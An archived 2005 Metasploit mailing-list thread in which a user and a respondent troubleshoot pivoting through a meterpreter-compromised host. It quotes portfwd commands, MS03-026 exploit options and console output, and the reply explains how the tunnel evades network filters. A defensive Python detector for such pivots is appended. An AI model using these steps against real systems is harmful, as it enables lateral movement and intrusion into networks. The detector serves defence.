Metasploit mailing list archives
use of meterpreter (copy for the list )
From: thomas.werth at vahle.de (Thomas Werth)
Date: Thu, 14 Apr 2005 10:14:56 +0200
Let's see if I understand correctly: Exploiting another host and using meterpreter is the first thing I do. Now the portfwd of meterpreter isn't running on the victim's host, instead it is running on "my" host, correct? Now I set up port forwarding using localhost and the next desired target IP. When now running the attack based on the proxy, port forwarding does its job and the exploit should work, correct?

Now my question for better understanding: As port forwarding is running on my host and the target IP is different from the "proxy host", why do I need to exploit the proxy host, as it seems to me this host isn't needed when using localhost and the next target IP for the "proxy attack"? How is the "flow of packets"? In case of logging on the "next target host", which attacker IP will be logged?

Thanks for your help.

mmiller at hick.org wrote:
> On Thu, Apr 14, 2005 at 09:10:12AM +0200, Thomas Werth wrote:
>> 1. Exploited "proxy victim" with metasploit's meterpreter payload.
>> 2. In meterpreter "shell" I'm adding some portfwd's like this:
>>    - portfwd -a -l 9500 -h 'nextTargetIP' -p 135
>>    - portfwd -a -l 4444 -h 'nextTargetIP' -p 4444 -P   // -P is just another test in hope it will work this time ...
>> 3. Now I'm using the msrpc exploit with win32_bind payload. Setting options:
>>
>>    msf msrpc_dcom_ms03_026(win32_bind) > show options
>>
>>    Exploit and Payload Options
>>    ===========================
>>
>>      Exploit:    Name      Default      Description
>>      --------    ------    -----------  ------------------
>>      required    RHOST     'ProxyHost'  The target address
>>      required    RPORT     9500         The target port
>>
>>      Payload:    Name      Default   Description
>>      --------    --------  -------   ------------------------------------------
>>      required    EXITFUNC  thread    Exit technique: "process", "thread", "seh"
>>      required    LPORT     4444      Listening port for bind shell
>>
>>      Target: Windows NT SP6/2K/XP/2K3 ALL
>>
>> 4. Now launching exploit:
>>
>>    msf msrpc_dcom_ms03_026(win32_bind) > exploit
>>
>> 5. That's where it hangs:
>>
>>    [*] Starting Bind Handler.
>>    [*] Got connection from 'HOST_I_USE_FOR_ATTACK':32773 <-> 'PROXY_HOST':4444
>>
>> 6. Waited long enough, killed connection with Ctrl-C:
>>
>>    Caught interrupt, exit connection? [y/n] y
>>    [*] Exiting Bind Handler.
>>
>> What am I doing wrong, or isn't it possible to use portfwd so attacks can be redirected through a proxy?
>
> The thing to note is that connections are proxied from your local machine through the meterpreter connection to the target that you are trying to reach. In the example you provided above, it appears that you are expecting the port forwards to be listening on the proxy host that you initially exploited. Instead, you should expect the port forward listeners to be listening on your local machine. All of the steps you performed were correct, except instead of using 'ProxyHost' you should use 127.0.0.1 for RHOST.
>
> I imagine the reason the bind handler got a connection is because you exploited the 'ProxyHost' with win32_bind (using port 4444). The reason connections are proxied starting from your local machine is because this allows you to transparently bypass any sort of inbound or outbound filters (since it tunnels through the already established meterpreter communication channel). Hope that helps!
--
MFG
Thomas Werth
Tel.: 02307 / 704 - 366
---------------------------------------------------------------------
Paul Vahle GmbH & Co. KG          URL : http://www.vahle.de
Westicker Strasse 52              E-Mail : thomas.werth at vahle.de
D-59174 Kamen
---------------------------------------------------------------------
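What the portfwd pivot discussed in this thread looks like from the defender's side, as an added example that is not part of the thread: a small Python detector over constructed connection-log lines (all addresses, the "10." internal range and the log format are placeholders) that flags an internal host which accepts an external connection and shortly afterwards opens new connections to other internal hosts, and that shows which source address the next target's own logs record. Because the forwarded connection is opened by the meterpreter process on the proxy host, the next target only ever sees the proxy host's address, not the attacker's machine.

```python
# Added example, not from the thread: what the meterpreter portfwd pivot
# described above looks like in connection logs. All addresses and the
# log format below are constructed placeholders.
from collections import defaultdict, namedtuple

Conn = namedtuple("Conn", "ts src dst dport")   # ts in seconds

# Constructed sample flow: attacker (203.0.113.5) holds a bind shell on the
# proxy host 10.0.0.20:4444; the proxy host then opens the forwarded
# connections to the next target 10.0.0.30 on 135 (msrpc) and 4444 (bind).
# The last line is unrelated internal traffic that must not be flagged.
SAMPLE_LOG = """\
100 203.0.113.5 10.0.0.20 4444
130 10.0.0.20 10.0.0.30 135
131 10.0.0.20 10.0.0.30 4444
200 10.0.0.11 10.0.0.12 445
"""

def is_internal(ip: str) -> bool:
    return ip.startswith("10.")          # placeholder internal range

def parse(log: str) -> list[Conn]:
    conns = []
    for line in log.splitlines():
        ts, src, dst, dport = line.split()
        conns.append(Conn(int(ts), src, dst, int(dport)))
    return conns

def find_pivots(conns: list[Conn], window: int = 600) -> dict:
    """Map each internal host that accepted an external connection and,
    within `window` seconds, opened new connections to other internal
    hosts, to the (target, port) pairs it reached."""
    inbound = defaultdict(list)          # host -> timestamps of external inbound
    for c in conns:
        if not is_internal(c.src) and is_internal(c.dst):
            inbound[c.dst].append(c.ts)
    pivots = defaultdict(list)
    for c in conns:
        if is_internal(c.src) and is_internal(c.dst) and c.src in inbound:
            if any(0 <= c.ts - t <= window for t in inbound[c.src]):
                pivots[c.src].append((c.dst, c.dport))
    return dict(pivots)

def sources_seen_by(conns: list[Conn], host: str) -> set[str]:
    """Source addresses the given host's own logs would record: for the
    next target this is only the proxy host, never the attacker."""
    return {c.src for c in conns if c.dst == host}
```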